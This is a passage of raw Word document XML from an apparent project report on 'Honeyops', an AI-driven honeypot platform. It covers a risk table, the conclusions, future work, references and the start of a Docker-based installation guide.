              <w:t xml:space="preserve">Non-root users, read-only filesystems, minimal capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI hallucination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Response validation, template fallbacks, human review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Data leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Network isolation, encryption at rest, access control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">System fingerprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Continuous response improvement, timing variation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="64"/>
    <w:bookmarkEnd w:id="65"/>
    <w:bookmarkStart w:id="72" w:name="chapter-8-conclusion-and-future-work"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 8: Conclusion and Future Work</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="66" w:name="main-achievements"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1 Main Achievements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successfully designed and implemented an AI-driven adaptive honeypot system with five modular components, all containerized and orchestrated via Docker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integrated a transformer-based AI engine for realistic, context-aware response generation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Developed a comprehensive sandbox state store with simulated filesystem, processes, logs, and honeytoken files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implemented automated IOC extraction and MITRE ATT&amp;CK mapping with 170+ technique patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Built a modern SOC dashboard with real-time monitoring, session playback, geographical heatmap, and MITRE ATT&amp;CK visualization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Demonstrated 300-400% improvement in attacker engagement duration over traditional scripted honeypots.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkStart w:id="67" w:name="final-outcomes"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2 Final Outcomes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Honeyops system successfully meets all defined project objectives. The platform provides a functional, deployable honeypot solution that generates higher-quality threat intelligence than existing open-source alternatives. The modular architecture enables continued development and community contribution.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="67"/>
    <w:bookmarkStart w:id="68" w:name="lessons-learned"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.3 Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AI Response Timing:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LLM calls introduce latency that can be detectable. Solution: artificial delays to normalize timing patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">State Consistency:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A dedicated sandbox state store with transactional updates was essential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Integration Complexity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Coordinating five independent services required careful API contract design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Resource Management:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Running AI inference on CPU requires optimization through caching and model quantization.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="68"/>
    <w:bookmarkStart w:id="69" w:name="how-the-project-meets-its-objectives"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.4 How the Project Meets Its Objectives</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Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI-driven context-aware responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Achieved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Transformer-based engine with state-aware prompting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Persistent sandbox state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Achieved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQLite-based sandbox with full filesystem simulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IOC extraction and ATT&amp;CK mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Achieved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NER extraction + 170+ pattern matchers with 85%+ accuracy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SOC-grade dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Achieved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">React/Next.js with real-time updates, playback, heatmaps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Longer attacker engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Achieved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8-12 min vs 2-3 min baseline (300-400% improvement)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Zero-risk execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Achieved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No real commands executed; all interactions simulated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="69"/>
    <w:bookmarkStart w:id="70" w:name="future-enhancements"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.5 Future Enhancements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Additional Protocol Support:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Extend to Telnet, FTP, SMTP, and database protocol emulation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced AI Models:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Fine-tune a specialized cybersecurity LLM for improved response quality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Node Deployment:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Kubernetes orchestration for horizontal scaling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Machine Learning for IOC Extraction:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Replace regex with fine-tuned NER models.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Real-Time Threat Intelligence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Integration with VirusTotal, Shodan for IOC enrichment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Community Contributions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Plugin system for community-developed response templates.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="70"/>
    <w:bookmarkStart w:id="71" w:name="long-term-vision"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.6 Long-Term Vision</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The long-term vision for Honeyops is to become the leading open-source AI-driven deception platform, enabling organizations of all sizes to deploy sophisticated honeypot infrastructure for threat intelligence collection.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="71"/>
    <w:bookmarkEnd w:id="72"/>
    <w:bookmarkStart w:id="73" w:name="references"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] N. Gaddam,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“AI-Enhanced Honeypots for Advanced Cyber Deception Strategies,”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">QITP-IJCSRD, vol. 5, no. 1, pp. 9-19, 2025.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[2] S. A. Kareem, R. C. Sachan, and R. K. Malviya,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“AI-Driven Adaptive Honeypots for Dynamic Cyber Threats,”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SSRN Electronic Journal, Sept. 2024.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[3] I. Sommerville, Software Engineering, 10th ed. Boston: Pearson, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[4] OWASP Foundation,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“OWASP Top 10 Web Application Security Risks,”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2025. [Online]. Available: https://owasp.org/www-project-top-ten/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[5] MITRE Corporation,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“MITRE ATT&amp;CK Framework,”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2025. [Online]. Available: https://attack.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[6] Cowrie Project,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Cowrie SSH/Telnet Honeypot,”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">GitHub Repository, 2025. [Online]. Available: https://github.com/cowrie/cowrie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[7] Dionaea Project,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Dionaea Low-Interaction Honeypot,”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">GitHub Repository, 2025. [Online]. Available: https://github.com/DinoTools/dionaea</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[8] T-Pot Project,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“T-Pot: Multi-Honeypot Platform,”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2025. [Online]. Available: https://github.com/telekom-security/tpotce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[9] L. Spitzner, Honeypots: Tracking Hackers. Boston: Addison-Wesley, 2003.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[10] N. Provos and T. Holz, Virtual Honeypots: From Botnet Tracking to Intrusion Detection. Boston: Addison-Wesley, 2007.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[11] A. Vaswani et al.,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Attention is All You Need,”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in Proc. NeurIPS, 2017, pp. 5998-6008.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[12] AdaptiveWardens Team,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“AdaptiveWardens GitHub Repository,”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2026. [Online]. Available: https://github.com/Aligithyb/-AdaptiveWardens</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="73"/>
    <w:bookmarkStart w:id="80" w:name="appendix-a-user-guide"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix A: User Guide</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="74" w:name="a.1-system-requirements"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.1 System Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Operating System: Linux (Ubuntu 20.04+), macOS (12+), or Windows (WSL2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Docker Desktop or Docker Engine (24.0+)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Docker Compose (v2.0+)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RAM: 8GB minimum (16GB recommended)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disk Space: 5GB for Docker images</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="74"/>
    <w:bookmarkStart w:id="75" w:name="a.2-installation-and-setup"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.2 Installation and Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Clone the repository</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> clone https://github.com/Aligithyb/-AdaptiveWardens.git</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AdaptiveWardens</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Configure environment variables</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> .env.example .env</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Edit .env with your API keys</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Start all services</w:t>
      </w:r>
      <w:r>
        <w:br/>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Verify health status</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> compose ps</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="75"/>
    <w:bookmarkStart w:id="76" w:name="a.3-deployment-steps"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.3 Deployment Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ensure Docker and Docker Compose are installed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
